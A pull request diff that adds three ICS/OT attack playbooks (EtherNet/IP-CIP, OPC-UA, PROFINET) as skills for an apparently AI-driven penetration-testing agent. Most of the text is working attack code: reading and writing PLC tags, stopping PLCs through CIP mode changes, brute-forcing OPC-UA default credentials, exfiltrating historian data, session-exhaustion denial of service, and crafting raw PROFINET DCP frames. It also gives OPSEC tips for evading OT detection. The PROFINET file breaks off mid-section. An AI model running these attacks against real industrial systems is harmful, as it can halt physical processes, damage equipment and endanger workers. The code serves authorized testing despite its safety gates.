### PR TITLE
feat(skills): ICS-OT OPC-UA / EtherNet-IP-CIP / PROFINET playbooks

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/enip-cip/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/enip-cip/SKILL.md
@@ -1,0 +1,277 @@
+---
+name: enip-cip
+description: "EtherNet/IP + CIP (TCP 44818 / UDP 2222) attack playbook — List Identity broadcast, pylogix tag-database dump, tag read/write on Allen-Bradley ControlLogix/CompactLogix, CIP Forward Open, PLC mode change (Stop/Run), and historical Rockwell auth-bypass CVEs. North American ICS dominant protocol."
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "ethernet/ip ethernetip enip cip 44818 2222 allen-bradley rockwell controllogix compactlogix pylogix cpppo plc tag list-identity forward-open"
+  subdomain: ics-ot
+  tags: enip, cip, ethernet-ip, plc, ics, ot, allen-bradley, rockwell
+  mitre_attack: T0855, T0836, T0816, T0814
+---
+
+# EtherNet/IP + CIP Attack Playbook (TCP 44818 / UDP 2222)
+
+EtherNet/IP is the dominant North American ICS protocol — every Allen-Bradley ControlLogix, CompactLogix, and MicroLogix ships with it enabled by default. CIP (Common Industrial Protocol) rides on top. Most deployments have no authentication at the CIP layer: if you can reach TCP 44818, you can read the full tag database and, in scope, write to process variables or change PLC execution state.
+
+## SAFETY FIRST
+
+CIP write operations (`Write()` on tags) and mode-change commands (`Stop`, `Run`, `Reset`) affect physical process equipment. A mode-change to `Stop` immediately halts the PLC program — the controlled process (conveyor, motor, pump, valve) goes to its fail-safe state or de-energizes. **Confirm written scope authorization for any write/control-class operation. Read and enumerate operations (tag list, controller info, identity) are safe.**
+
+## Prerequisites
+
+```bash
+# Install pylogix (Allen-Bradley EtherNet/IP client)
+pip install pylogix
+
+# Install cpppo (Rockwell EtherNet/IP / CIP toolkit)
+pip install cpppo
+
+# nmap EtherNet/IP scripts
+# Built-in: enip-info.nse (ships with Nmap >= 7.80)
+nmap -p 44818 --open -sV 10.0.0.0/24
+```
+
+## Phase 1 — Discover
+
+### UDP 2222 List Identity broadcast
+
+UDP 2222 carries the ENIP "List Identity" command — no session, no authentication. Send a broadcast and all EtherNet/IP devices on the subnet respond with vendor, product name, serial number, firmware revision, and IP.
+
+```bash
+# Using cpppo enip command-line
+python3 -m cpppo.server.enip.list_identity 10.0.0.255
+# Or unicast:
+python3 -m cpppo.server.enip.list_identity 10.0.0.5
+
+# Example output:
+# {'product_name': 'ControlLogix5580', 'vendor_id': 1, 'device_type': 14,
+#  'product_code': 166, 'revision': {'major': 33, 'minor': 11},
+#  'serial_number': '0xA1B2C3D4', 'status': 12340}
+```
+
+```bash
+# nmap enip-info script (TCP 44818)
+nmap -p 44818 --script enip-info 10.0.0.5
+# Returns: VendorID, DeviceType, ProductCode, Revision, Serial, ProductName, State
+```
+
+```python
+# pylogix PLC info — TCP 44818
+from pylogix import PLC
+
+with PLC() as comm:
+    comm.IPAddress = "10.0.0.5"
+    info = comm.GetPLCTime()
+    print("PLC time:", info.Value)
+    props = comm.GetModuleProperties(0)
+    print("Module:", props.Value)
+```
+
+## Phase 2 — Tag database enumeration (unauthenticated on ControlLogix/CompactLogix)
+
+ControlLogix and CompactLogix expose the entire controller tag database via CIP symbolic segment reads — no authentication required. This includes tag names, data types, dimensions, and access attributes.
+
+```python
+from pylogix import PLC
+
+with PLC() as comm:
+    comm.IPAddress = "10.0.0.5"
+
+    # Enumerate all controller-scoped tags
+    tags = comm.GetTagList()
+    print(f"[*] Found {len(tags.Value)} controller tags")
+    for tag in tags.Value:
+        print(f"  {tag.TagName:<40} Type={tag.DataType:<20} Dim={tag.Dimensions}")
+
+    # Enumerate program-scoped tags (programs inside the controller)
+    programs = comm.GetProgramList()
+    for prog in programs.Value:
+        prog_tags = comm.GetProgramTagList(prog)
+        print(f"\n[*] Program '{prog}': {len(prog_tags.Value)} tags")
+        for tag in prog_tags.Value:
+            print(f"  {prog}:{tag.TagName:<36} Type={tag.DataType}")
+```
+
+Tag names are often self-describing in production environments:
+- `PumpStation_1.RunCmd` — pump run command coil
+- `Valve_FV_101.OpenCmd` — valve open command
+- `Reactor_TIC_201.SP` — temperature setpoint
+- `Safety_SIL2.BypassActive` — safety interlock bypass flag
+
+## Phase 3 — Read tags
+
+```python
+from pylogix import PLC
+
+with PLC() as comm:
+    comm.IPAddress = "10.0.0.5"
+
+    # Read a single tag
+    result = comm.Read("PumpStation_1.RunCmd")
+    print(f"PumpStation_1.RunCmd = {result.Value}  (Status: {result.Status})")
+
+    # Read multiple tags in one request (efficient)
+    tag_list = [
+        "Reactor_TIC_201.SP",
+        "Reactor_TIC_201.PV",
+        "Valve_FV_101.OpenCmd",
+        "Safety_SIL2.BypassActive",
+    ]
+    results = comm.Read(tag_list)
+    for r in results:
+        print(f"  {r.TagName} = {r.Value}  Status={r.Status}")
+
+    # Read array elements
+    array_result = comm.Read("RecipeArray[0]", 10)  # read 10 elements from index 0
+    print("Recipe[0:10]:", array_result.Value)
+```
+
+## Phase 4 — Write tags (SAFETY GATE — write-class authorization required)
+
+> **STOP. Confirm written scope authorization before this phase.**
+> Writing process control tags may energize/de-energize actuators immediately.
+
+```python
+from pylogix import PLC
+
+# Write a BOOL tag
+with PLC() as comm:
+    comm.IPAddress = "10.0.0.5"
+
+    # Example: write a setpoint — requires authorization
+    result = comm.Write("Reactor_TIC_201.SP", 85.0)
+    print(f"Write SP: {result.Status}")
+
+    # Example: write a BOOL control tag — requires authorization
+    result = comm.Write("PumpStation_1.RunCmd", 1)
+    print(f"Write RunCmd: {result.Status}")
+```
+
+Write status codes: `Success` = write accepted by PLC; `PathSegmentError` = bad tag name; `ServiceError` = PLC in Program mode or inhibited.
+
+## Phase 5 — CIP mode change: Stop / Run / Reset
+
+Mode change via CIP is a direct PLC execution-state change. Stop halts the ladder/function-block program. Reset is a cold restart.
+
+```python
+import cpppo
+from cpppo.server.enip import client
+
+# CIP explicit messaging to change PLC mode
+# Rockwell ControlLogix CIP Service 0x0F (Set Attribute Single)
+# Object: 0x01 (Identity Object), Instance 1, Attribute 10 (Controller State)
+# Mode: 0x01 = Run, 0x02 = Program (Stop)
+
+def set_plc_mode(ip, mode_val, port=44818):
+    """
+    mode_val: 0x01 = Run, 0x02 = Program (effectively Stop)
+    Requires write-class scope authorization.
+    """
+    operations = [
+        {
+            "method": "set_attribute_single",
+            "path": "@0x01/1/10",
+            "data": [mode_val],
+        }
+    ]
+    with client.connector(host=ip, port=port) as conn:
+        for op in operations:
+            conn.set_attribute_single(
+                path=op["path"],
+                data=op["data"],
+            )
+        conn.collect(timeout=2)
+        print(f"Mode change to {mode_val:#04x} sent")
+
+# set_plc_mode("10.0.0.5", 0x02)   # Stop (Program mode) — halts PLC program
+# set_plc_mode("10.0.0.5", 0x01)   # Run
+```
+
+Alternatively, pylogix provides a direct wrapper:
+
+```python
+with PLC() as comm:
+    comm.IPAddress = "10.0.0.5"
+    # Some pylogix versions expose:
+    comm.GetPLCTime()  # verify connectivity first
+    # comm.Write("_RunMode", 0)  # vendor-specific; verify tag exists first
+```
+
+## Phase 6 — Historical Rockwell auth-bypass CVEs
+
+| CVE | Product | Description | CVSS |
+|---|---|---|---|
+| CVE-2021-27478 | Studio 5000 Logix Designer | Unauth remote code execution via CIP messaging | 10.0 |
+| CVE-2022-1159 | Rockwell Automation FactoryTalk | Executable injection via DLL hijack path | 7.7 |
+| CVE-2023-3595 | ControlLogix 1756 (firmware <= 33.011) | Path traversal in CIP service; unauthenticated firmware read/write | 9.8 |
+| CVE-2023-3596 | GuardLogix 1756 | Same family — safety controller variant | 9.8 |
+| CVE-2024-6242 | ControlLogix 1756 | CIP Trusted Slot mechanism bypass — pivot between chassis slots | 8.4 |
+
+CVE-2023-3595 / 3596 (Claroty "LogiSploit") is the most relevant for live engagements — unauthenticated firmware upload/download against unpatched ControlLogix. Patch check:
+
+```python
+# Firmware version from pylogix
+with PLC() as comm:
+    comm.IPAddress = "10.0.0.5"
+    props = comm.GetModuleProperties(0)
+    print("Firmware:", props.Value)
+    # Compare against Rockwell Security Advisory RLSA-2023-0026
+    # Affected: < v33.012 (1756-EN2* family)
+```
+
+## Common findings
+
+| Finding | MITRE | Impact |
+|---|---|---|
+| Internet-exposed EtherNet/IP (Shodan: port:44818) | T0882 | Direct PLC access from internet |
+| No CIP authentication — tag list readable | T0855 | Full process variable visibility |
+| Tag write accepted without auth | T0836 | Direct process manipulation |
+| PLC mode change accepted (Stop) | T0816 | Halt production line |
+| Flat IT/OT VLAN — office → PLC direct | T0814 | Lateral movement from compromised workstation |
+| Unpatched ControlLogix (CVE-2023-3595) | T0839 | Firmware read/write, persistent implant |
+| Safety PLC (GuardLogix) reachable | T0857 | Safety system manipulation |
+
+## Evidence
+
+```python
+kg_add_node(
+    kind="finding",
+    label="EtherNet/IP unauthenticated tag access",
+    props={
+        "key": f"enip-cip-anon::{target_ip}",
+        "protocol": "enip-cip",
+        "port": 44818,
+        "product_name": "<ProductName>",
+        "firmware_revision": "<major.minor>",
+        "tag_count": len(tags.Value),
+        "writable": False,  # set True only after confirmed write-scope
+        "source": "pylogix-taglist",
+    },
+)
+```
+
+## ZFP (two-method evidence)
+
+1. `pylogix GetTagList()` output showing tag count + representative tag names with data types.
+2. `pylogix Read()` result for at least one process variable showing a live value (e.g., temperature, pressure, motor state).
+
+If write testing was authorized: include `Write()` result showing `Status=Success` and a Read back confirming value change.
+
+## OPSEC notes
+
+- EtherNet/IP has no built-in audit log at the CIP layer. Tag reads are silent to most OT security platforms unless a Nozomi/Claroty NDR is deployed with flow-level inspection.
+- High-frequency polling (e.g., reading all tags in a tight loop) is detectable as anomalous traffic volume. Space enumeration reads out.
+- Mode-change commands (Stop/Program) generate an event in the PLC's event log (RSLogix Diagnostics > General Fault). This persists across power cycles.
+- Shodan regularly indexes internet-facing EtherNet/IP; pre-engagement Shodan search for the target's IP space can reveal exposure level before active scanning.
+- CVE-2023-3595 exploit PoC (Claroty): confirm firmware version before using; firmware write is destructive and may brick the controller.
+
+## References
+
+- pylogix — github.com/dmroeder/pylogix
+- cpppo — github.com/pjkundert/cpppo
+- ODVA EtherNet/IP and CIP Specifications — odva.org
+- Claroty Team82 "LogiSploit" (CVE-2023-3595/3596) — claroty.com/team82
+- CVE-2024-6242 Rockwell Trusted Slot bypass — icsadvisory.ot-security.io
+- ICS-CERT Rockwell advisories — cisa.gov/uscert/ics/advisories
+- "Exploiting Industrial Control Systems" — Reid Wightman, S4 Conference
+- Shodan dork reference — https://www.shodan.io/search?query=port%3A44818

--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/opcua/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/opcua/SKILL.md
@@ -1,0 +1,373 @@
+---
+name: opcua
+description: "OPC-UA (TCP 4840) attack playbook — endpoint enumeration, SecurityPolicy mapping, anonymous/weak-auth abuse, address-space browsing and tag read, HistoryRead exfiltration, Method call for control actions, session-exhaustion DoS. Modern IT/OT DMZ convergence protocol replacing legacy fieldbus."
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "opc opcua opc-ua 4840 unified architecture ics ot scada getendpoints anonymous asyncua opcua-asyncio discovery node address-space historyread session exhaustion"
+  subdomain: ics-ot
+  tags: opcua, ics, ot, scada, opc-ua
+  mitre_attack: T0855, T0846, T0814, T0882
+---
+
+# OPC-UA Attack Playbook (TCP 4840)
+
+OPC-UA is the dominant modern IT/OT convergence protocol — Siemens, ABB, Rockwell, Honeywell, and most new DCS/SCADA deployments expose it alongside or instead of legacy fieldbus. It supports security (signing + encryption) but many deployments leave `SecurityPolicy: None` active for "backwards compatibility," giving full unauthenticated access to the address space.
+
+## SAFETY FIRST
+
+OPC-UA Method calls can directly invoke control actions (start/stop, setpoint override, firmware update). **Confirm written scope authorization before any call to Method nodes or write to Variable nodes.** Read-only browsing (BrowseRequest, ReadRequest on status/telemetry nodes) is generally safe.
+
+## Prerequisites
+
+```bash
+# Install asyncua (successor to python-opcua / opcua-asyncio)
+pip install asyncua
+
+# Also useful: opcua-client GUI (optional), opcua-scan
+pip install opcua-scan
+# OR clone Wavestone opcua-scan:
+# git clone https://github.com/wavestone-cdt/opcua-scan
+
+# Confirm target reachability
+nmap -p 4840 --open -sV 10.0.0.0/24
+```
+
+## Phase 1 — Discover
+
+```bash
+# nmap service banner on 4840
+nmap -p 4840 -sV --script=opcua-discovery 10.0.0.5
+
+# OPC UA Hello probe — get the server's application description
+# opcua-scan sends a HEL/ACK and reads GetEndpoints without connecting to a session
+python3 -m opcuascan 10.0.0.5:4840
+# Output includes: ProductName, ApplicationUri, SecurityPolicies, supported UserIdentityTokens
+```
+
+## Phase 2 — GetEndpoints (unauthenticated policy enumeration)
+
+GetEndpoints is always available without a session — it's the pre-auth discovery call.
+
+```python
+import asyncio
+from asyncua import Client
+
+async def get_endpoints():
+    url = "opc.tcp://10.0.0.5:4840"
+    # Use None security policy — client sends HEL, gets ACK, calls GetEndpoints
+    async with Client(url=url) as client:
+        endpoints = await client.get_endpoints()
+        for ep in endpoints:
+            print(f"URL: {ep.EndpointUrl}")
+            print(f"  SecurityMode: {ep.SecurityMode}")       # 1=None, 2=Sign, 3=SignAndEncrypt
+            print(f"  SecurityPolicy: {ep.SecurityPolicyUri}")
+            for tok in ep.UserIdentityTokens:
+                print(f"  Token: {tok.TokenType}")  # 0=Anonymous, 1=UserName, 2=Certificate, 3=IssuedToken
+
+asyncio.run(get_endpoints())
+```
+
+Key findings to record:
+- `SecurityMode: 1` (None) + `SecurityPolicy: http://opcfoundation.org/UA/SecurityPolicy#None` → plaintext, no signing. Traffic is readable in Wireshark.
+- `TokenType: 0` (Anonymous) accepted → no credentials needed.
+- `TokenType: 1` (UserName) present → attempt default/dictionary creds.
+
+## Phase 3 — Auth testing
+
+### Anonymous connect
+
+```python
+import asyncio
+from asyncua import Client
+
+async def anon_connect():
+    url = "opc.tcp://10.0.0.5:4840/OPCUA/SimulationServer"
+    async with Client(url=url) as client:
+        # No credentials set — asyncua defaults to Anonymous token
+        root = client.get_root_node()
+        print("Root node:", await root.read_browse_name())
+        # Successful connection here = Anonymous accepted
+        server_node = client.get_server_node()
+        status = await server_node.get_child(["0:ServerStatus"])
+        print("Server status:", await status.read_value())
+
+asyncio.run(anon_connect())
+```
+
+### Username/password dictionary attack
+
+```python
+import asyncio
+from asyncua import Client
+from asyncua.ua import uaerrors
+
+DEFAULT_CREDS = [
+    ("admin", "admin"), ("administrator", "administrator"),
+    ("opcua", "opcua"), ("user", "user"), ("guest", ""),
+    ("operator", "operator"), ("root", "root"), ("OpcUaClient", ""),
+    ("Anonymous", ""), ("siemens", "siemens"), ("admin", ""),
+]
+
+async def brute_opcua(url):
+    for user, pwd in DEFAULT_CREDS:
+        try:
+            async with Client(url=url) as client:
+                await client.set_user(user)
+                await client.set_password(pwd)
+                await client.connect()
+                print(f"[+] VALID: {user}:{pwd}")
+                return user, pwd
+        except uaerrors.BadUserAccessDenied:
+            print(f"[-] {user}:{pwd} — denied")
+        except uaerrors.BadIdentityTokenRejected:
+            print(f"[-] {user}:{pwd} — rejected")
+        except Exception as e:
+            print(f"[!] {user}:{pwd} — {e}")
+    return None, None
+
+asyncio.run(brute_opcua("opc.tcp://10.0.0.5:4840"))
+```
+
+## Phase 4 — Address-space browsing and tag read
+
+Once authenticated (anonymous or credentialed):
+
+```python
+import asyncio
+from asyncua import Client, ua
+
+async def browse_and_read(url, depth=3):
+    async with Client(url=url) as client:
+        # Browse from Objects folder (standard entry point for process data)
+        objects = client.get_objects_node()
+
+        async def recurse(node, level=0):
+            try:
+                children = await node.get_children()
+                name = await node.read_browse_name()
+                print("  " * level + f"[{name.Name}] NodeId={node.nodeid}")
+                for child in children:
+                    cls = await child.read_node_class()
+                    if cls == ua.NodeClass.Variable:
+                        try:
+                            val = await child.read_value()
+                            cname = await child.read_browse_name()
+                            print("  " * (level+1) + f"VAR {cname.Name} = {val}")
+                        except Exception:
+                            pass
+                    if level < depth:
+                        await recurse(child, level + 1)
+            except Exception as e:
+                print("  " * level + f"[browse error: {e}]")
+
+        await recurse(objects)
+
+asyncio.run(browse_and_read("opc.tcp://10.0.0.5:4840"))
+```
+
+Key nodes to target:
+- `Objects/Server/ServerStatus` — build info, start time, current time (always readable, even anonymous)
+- `Objects/DeviceSet/` or `Objects/<VendorNamespace>/` — vendor-specific process variables
+- Node class `Method` — callable control actions (pump start, valve position, firmware upload)
+
+### Read ServerStatus for vendor/version fingerprint
+
+```python
+async with Client(url=url) as client:
+    nsidx = await client.get_namespace_index("http://opcfoundation.org/UA/")
+    build_info = await client.nodes.server.get_child(["0:ServerStatus", "0:BuildInfo"])
+    product = await build_info.get_child(["0:ProductName"])
+    version = await build_info.get_child(["0:SoftwareVersion"])
+    print(await product.read_value(), await version.read_value())
+    # e.g.: "Prosys OPC UA Simulation Server" "5.4.6"
+    # e.g.: "Unified Automation UaGateway" "3.3.0"
+    # e.g.: "open62541" "1.3.6"
+```
+
+## Phase 5 — HistoryRead (process data exfiltration)
+
+Many historian/SCADA OPC-UA servers expose historical process values via `HistoryRead`. This can dump weeks of sensor/tag data unauthenticated.
+
+```python
+import asyncio
+from asyncua import Client, ua
+from datetime import datetime, timedelta, timezone
+
+async def history_read(url, node_id_str):
+    async with Client(url=url) as client:
+        node = client.get_node(node_id_str)  # e.g. "ns=2;s=Temperature"
+        end_time = datetime.now(timezone.utc)
+        start_time = end_time - timedelta(hours=24)
+
+        result = await client.history_read(
+            nodes=[node],
+            pe=ua.ReadRawModifiedDetails(
+                IsReadModified=False,
+                StartTime=start_time,
+                EndTime=end_time,
+                NumValuesPerNode=1000,
+                ReturnBounds=True,
+            )
+        )
+        for dv in result[0].HistoryData.DataValues:
+            print(f"  {dv.SourceTimestamp}  {dv.Value.Value}")
+
+asyncio.run(history_read("opc.tcp://10.0.0.5:4840", "ns=2;s=Temperature"))
+```
+
+## Phase 6 — Method node calls (write-class, SAFETY GATE)
+
+> **STOP. Write-class authorization required before executing this phase.**
+> Method calls may directly actuate physical equipment.
+
+```python
+import asyncio
+from asyncua import Client, ua
+
+async def call_method(url, object_node_id, method_node_id, *args):
+    """
+    Call an OPC UA Method node.
+    object_node_id: NodeId of the parent Object (e.g. "ns=2;s=PumpController")
+    method_node_id: NodeId of the Method (e.g. "ns=2;s=PumpController.Start")
+    """
+    async with Client(url=url) as client:
+        obj = client.get_node(object_node_id)
+        method = client.get_node(method_node_id)
+        result = await obj.call_method(method, *args)
+        print("Method result:", result)
+
+# Example: call a simulated start method
+# asyncio.run(call_method("opc.tcp://10.0.0.5:4840",
+#     "ns=2;s=PumpController", "ns=2;s=PumpController.Start"))
+```
+
+Enumeration of available methods (read-only, safe):
+
+```python
+async with Client(url=url) as client:
+    objects = client.get_objects_node()
+    async def find_methods(node, level=0):
+        try:
+            for child in await node.get_children():
+                cls = await child.read_node_class()
+                if cls == ua.NodeClass.Method:
+                    name = await child.read_browse_name()
+                    print("  " * level + f"[METHOD] {name.Name}  NodeId={child.nodeid}")
+                elif cls in (ua.NodeClass.Object, ua.NodeClass.ObjectType):
+                    if level < 4:
+                        await find_methods(child, level + 1)
+        except Exception:
+            pass
+    await find_methods(objects)
+```
+
+## Phase 7 — Session exhaustion DoS
+
+CVE-2024-53429 (open62541 <= 1.3.12) and CVE-2025-7390 (Softing OPC UA C++ SDK) involve oversized ExtensionObject / replay leading to server crash or excessive resource consumption. Generic session flooding is applicable to servers with no connection limit:
+
+```python
+import asyncio
+from asyncua import Client
+
+async def exhaust_sessions(url, count=500):
+    """Open many sessions without closing them — exhausts server thread pool / session table."""
+    clients = []
+    for i in range(count):
+        try:
+            c = Client(url=url)
+            await c.connect()
+            clients.append(c)
+            if i % 50 == 0:
+                print(f"  {i} sessions open")
+        except Exception as e:
+            print(f"  Session {i} failed: {e} — server may be saturated")
+            break
+    print(f"Total open sessions: {len(clients)}")
+    # Note: gate behind explicit DoS authorization. Leaving sessions open will
+    # degrade or crash production servers.
+    for c in clients:
+        try:
+            await c.disconnect()
+        except Exception:
+            pass
+
+# asyncio.run(exhaust_sessions("opc.tcp://10.0.0.5:4840"))
+```
+
+> Gate this behind `permitted_actions: denial_of_service`. Do not run against production without explicit sign-off.
+
+## Common findings
+
+| Finding | MITRE | Impact |
+|---|---|---|
+| SecurityPolicy: None accepted | T0882 | Full plaintext traffic; passive sniff reveals tag values + credentials |
+| Anonymous access to Objects node | T0855 | Read process telemetry without credentials |
+| Anonymous HistoryRead | T0846 | Exfiltrate weeks of process historian data |
+| Default credentials (admin/admin) | T0814 | Full authenticated access; potential Method call |
+| Method nodes callable without write authorization | T0836 | Control actions (pump/valve/setpoint) with no auth barrier |
+| No session limit (DoS via exhaustion) | T0814 | Crash or freeze OPC-UA server, disrupting HMI/SCADA polling |
+| Internet-exposed OPC-UA (Shodan: port:4840) | T0882 | Direct ICS access from internet |
+
+## Evidence
+
+On anonymous or credentialed access, persist:
+
+```python
+kg_add_node(
+    kind="finding",
+    label="OPC-UA anonymous access / SecurityPolicy None",
+    props={
+        "key": f"opcua-anon::{target_ip}",
+        "protocol": "opc-ua",
+        "port": 4840,
+        "security_mode": "None",
+        "anonymous_access": True,
+        "server_product": "<ProductName>",
+        "server_version": "<SoftwareVersion>",
+        "nodes_readable": "<count>",
+        "source": "asyncua-getendpoints+browse",
+    },
+)
+```
+
+On credential find:
+
+```python
+kg_add_node(
+    kind="credential",
+    label=f"OPC-UA credential on {target_ip}",
+    props={
+        "key": f"opcua-cred::{target_ip}",
+        "secret_type": "opcua_username",
+        "username": user,
+        "password": pwd,
+        "target": target_ip,
+        "port": 4840,
+        "source": "opcua-brute",
+    },
+)
+```
+
+## ZFP (two-method evidence)
+
+1. `asyncua` output showing GetEndpoints response with `SecurityMode=1` and/or `TokenType=Anonymous`.
+2. Browse dump listing at least one process Variable node with a read value, OR hashcat-style session log showing valid credential.
+
+## OPSEC notes
+
+- GetEndpoints and anonymous Browse generate no auth event in most OPC-UA server logs. Behaviorally quiet.
+- Credentialed sessions generate an `AuditCreateSessionEvent` and `AuditActivateSessionEvent` in the OPC-UA audit log if the server has `AuditingEnabled=True`. Check `ns=0;i=2994` (AuditingEnabled) before credentialed ops.
+- Claroty / Nozomi OT NDR platforms signature-detect OPC-UA anonymous sessions and unusual HistoryRead volumes. Use rate-limiting in enumerate loops.
+- CVE-2024-53429 and CVE-2025-7390 crashes are irreversible remotely; check server software version before any DoS testing.
+- Physical-safety gate: any Variable write or Method call may affect a physical actuator. Treat all write-class operations as requiring explicit scope authorization.
+
+## References
+
+- asyncua docs — github.com/FreeOpcUa/opcua-asyncio
+- opcua-scan (Wavestone) — github.com/wavestone-cdt/opcua-scan
+- Claroty Team82 OPC-UA research — claroty.com/team82/research/opcua
+- arXiv 2003.12341 — "A Systematic Methodology for ICS OPC-UA Security Assessment"
+- CVE-2024-53429 — open62541 session handling DoS
+- CVE-2025-7390 — Softing OPC UA C++ SDK replay
+- ICS-CERT advisories — cisa.gov/uscert/ics/advisories
+- OPC Foundation UA Specification Part 2 (Security Model), Part 4 (Services)

--- a/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/profinet/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/ics-ot/profinet/SKILL.md
@@ -1,0 +1,351 @@
+---
+name: profinet
+description: "PROFINET (L2 EtherType 0x8892 / DCP) attack playbook — DCP Identify-All broadcast enumeration, device fingerprinting, station-name and IP reassignment (breaks IO-controller mapping), flash-LED physical location, factory-reset, RT frame injection/replay for cyclic-IO spoofing. Siemens/EU fieldbus peer of S7Comm; requires same L2 broadcast domain."
+allowed-tools: Bash Read Write
+metadata:
+  when_to_use: "profinet profinet-rt dcp 0x8892 34962 34963 34964 siemens fieldbus pnio discovery device-name station-name reassign flash-led factory-reset"
+  subdomain: ics-ot
+  tags: profinet, dcp, siemens, ics, ot, fieldbus
+  mitre_attack: T0842, T0846, T0814, T0816
+---
+
+# PROFINET Attack Playbook (EtherType 0x8892 / DCP)
+
+PROFINET is the dominant European/Siemens fieldbus for deterministic real-time process automation — deployed in Siemens SIMATIC PLC networks, Beckhoff TwinCAT, Phoenix Contact, and virtually all post-2005 EU manufacturing. Unlike Modbus or EtherNet/IP, PROFINET RT operates at Layer 2 (EtherType 0x8892) — there is no IP header, no routing, and no firewall coverage at the IP layer. **The attacker must be on the same Ethernet broadcast domain (OT L2 segment, or have a SPAN/TAP into it).** DCP (Discovery and basic Configuration Protocol) provides unauthenticated device enumeration, naming, IP assignment, and factory-reset — all without credentials.
+
+## SAFETY FIRST
+
+DCP Set commands (station-name reassignment, IP change, factory-reset) immediately disrupt the IO-controller ↔ IO-device association. When an IO-device loses its expected station name, the PROFINET IO controller goes to `BF` (Bus Fault) state and the process typically enters a safe/halt state or continues with the last-known values depending on watchdog configuration. **This is a process-disruption event. Confirm written scope authorization before any DCP Set or RT frame injection.** DCP Identify (read) is safe.
+
+## Prerequisites
+
+- Physical or logical access to the OT L2 segment (direct port, rogue switch, SPAN, compromised HMI/engineering workstation on the same VLAN).
+- Wireshark with `pn_dcp` dissector (ships by default — filter: `pn_dcp`).
+- Python with `scapy` for DCP crafting (or `python-profinet` library).
+
+```bash
+# Verify interface sees PROFINET frames
+sudo tcpdump -i eth0 ether proto 0x8892 -c 20
+# If frames appear: you are on the OT segment
+
+# Install scapy (already on Kali)
+pip install scapy
+
+# python-profinet (alternative higher-level library)
+pip install profinet
+```
+
+## Phase 1 — Discover: DCP Identify-All broadcast
+
+DCP Identify-All is a Layer-2 broadcast to `01:0E:CF:00:00:00` (PROFINET multicast). All devices on the segment reply with their station name, IP, MAC, device type, vendor, order number, firmware.
+
+### Wireshark passive discovery
+
+```bash
+# Capture DCP traffic — Identify requests and responses
+sudo wireshark -i eth0 -f "ether proto 0x8892" -k
+# Filter in Wireshark: pn_dcp.block_type == 0x0101 (NameOfStation)
+# Filter for Identify responses: pn_dcp.service_id == 5 && pn_dcp.service_type == 1
+```
+
+### Active DCP Identify-All broadcast (Scapy)
+
+```python
+from scapy.all import Ether, sendp, sniff
+import struct, socket, time
+
+PROFINET_ETHERTYPE = 0x8892
+DCP_MULTICAST_MAC = "01:0e:cf:00:00:00"
+IFACE = "eth0"  # replace with your OT interface
+
+def build_dcp_identify_all(xid=1):
+    """Build a PROFINET DCP Identify-All request frame."""
+    # PROFINET Real-Time header: FrameID 0xFEFE (DCP Identify)
+    frame_id = struct.pack(">H", 0xFEFE)
+    # DCP header: ServiceID=5 (Identify), ServiceType=0 (Request), XID, Reserved, DCPDataLength
+    dcp_header = struct.pack(">BBHHHH",
+        0x05,   # ServiceID: Identify
+        0x00,   # ServiceType: Request
+        xid,    # XID
+        0x0000, # Reserved
+        0x0000, # ResponseDelay (0=immediate broadcast)
+        0x0004, # DCPDataLength (4 bytes for the suboption block)
+    )
+    # DCP block: Option=All (0xFF), Suboption=All (0xFF), DCPBlockLength=0
+    dcp_block = struct.pack(">BBH", 0xFF, 0xFF, 0x0000)
+
+    payload = frame_id + dcp_header + dcp_block
+    frame = Ether(dst=DCP_MULTICAST_MAC, src="00:11:22:33:44:55", type=PROFINET_ETHERTYPE) / payload
+    return frame
+
+def dcp_identify_all(iface=IFACE, timeout=3):
+    frame = build_dcp_identify_all()
+    sendp(frame, iface=iface, verbose=False)
+    print(f"[*] DCP Identify-All sent on {iface}, listening {timeout}s for responses...")
+
+    responses = sniff(
+        iface=iface,
+        filter=f"ether proto {hex(PROFINET_ETHERTYPE)}",
+        timeout=timeout,
+        count=200,
+    )
+    devices = []
+    for pkt in responses:
+        raw = bytes(pkt.payload)
+        frame_id = struct.unpack(">H", raw[:2])[0]
+        if frame_id == 0xFEFE and len(raw) > 10:
+            # This is a DCP response — parse it
+            src_mac = pkt.src
+            # Extract NameOfStation from block (simple heuristic parse)
+            # Full parsing requires walking DCP blocks; Wireshark's pn_dcp is most reliable
+            devices.append({"mac": src_mac, "raw_len": len(raw)})
+            print(f"  Response from {src_mac} ({len(raw)} bytes) — open in Wireshark for details")
+    return devices
+
+dcp_identify_all()
+```
+
+### Using Siemens STEP 7 / TIA Portal (if available on compromised engineering workstation)
+
+TIA Portal's "Accessible Devices" scan (Menu → Online → Accessible Devices) runs DCP Identify-All automatically and displays a parsed device table — vendor, order number, station name, IP, MAC. This is the fastest enumeration method from a compromised EWS.
+
+## Phase 2 — Device fingerprinting: DCP Get
+
+DCP Get retrieves specific blocks from a unicast target (by MAC address or station name). Returns: vendor ID, order ID, firmware version, device role (IO-Device / IO-Controller / IO-Supervisor).
+
+```python
+from scapy.all import Ether, sendp, sniff
+import struct
+
+PROFINET_ETHERTYPE = 0x8892
+IFACE = "eth0"
+
+def build_dcp_get(dst_mac, xid=2, option=0x01, suboption=0x01):
+    """
+    DCP Get Request for a specific block.
+    option 0x01 suboption 0x01 = NameOfStation
+    option 0x01 suboption 0x02 = IPSuite (IP address, subnet, gateway)
+    option 0x02 suboption 0x01 = ManufacturerSpecific (VendorID, DeviceID)
+    option 0x02 suboption 0x05 = DeviceOptions
+    """
+    frame_id = struct.pack(">H", 0xFEFD)  # 0xFEFD = DCP Get/Set
+    dcp_header = struct.pack(">BBHHHH",
+        0x03,          # ServiceID: Get
+        0x00,          # ServiceType: Request
+        xid,
+        0x0000,
+        0x0000,
+        0x0004,        # DCPDataLength
+    )
+    dcp_block = struct.pack(">BBH", option, suboption, 0x0000)
+    payload = frame_id + dcp_header + dcp_block
+    return Ether(dst=dst_mac, src="00:11:22:33:44:55", type=PROFINET_ETHERTYPE) / payload
+
+# Get station name from device with known MAC
+# frame = build_dcp_get("aa:bb:cc:dd:ee:ff", option=0x01, suboption=0x01)
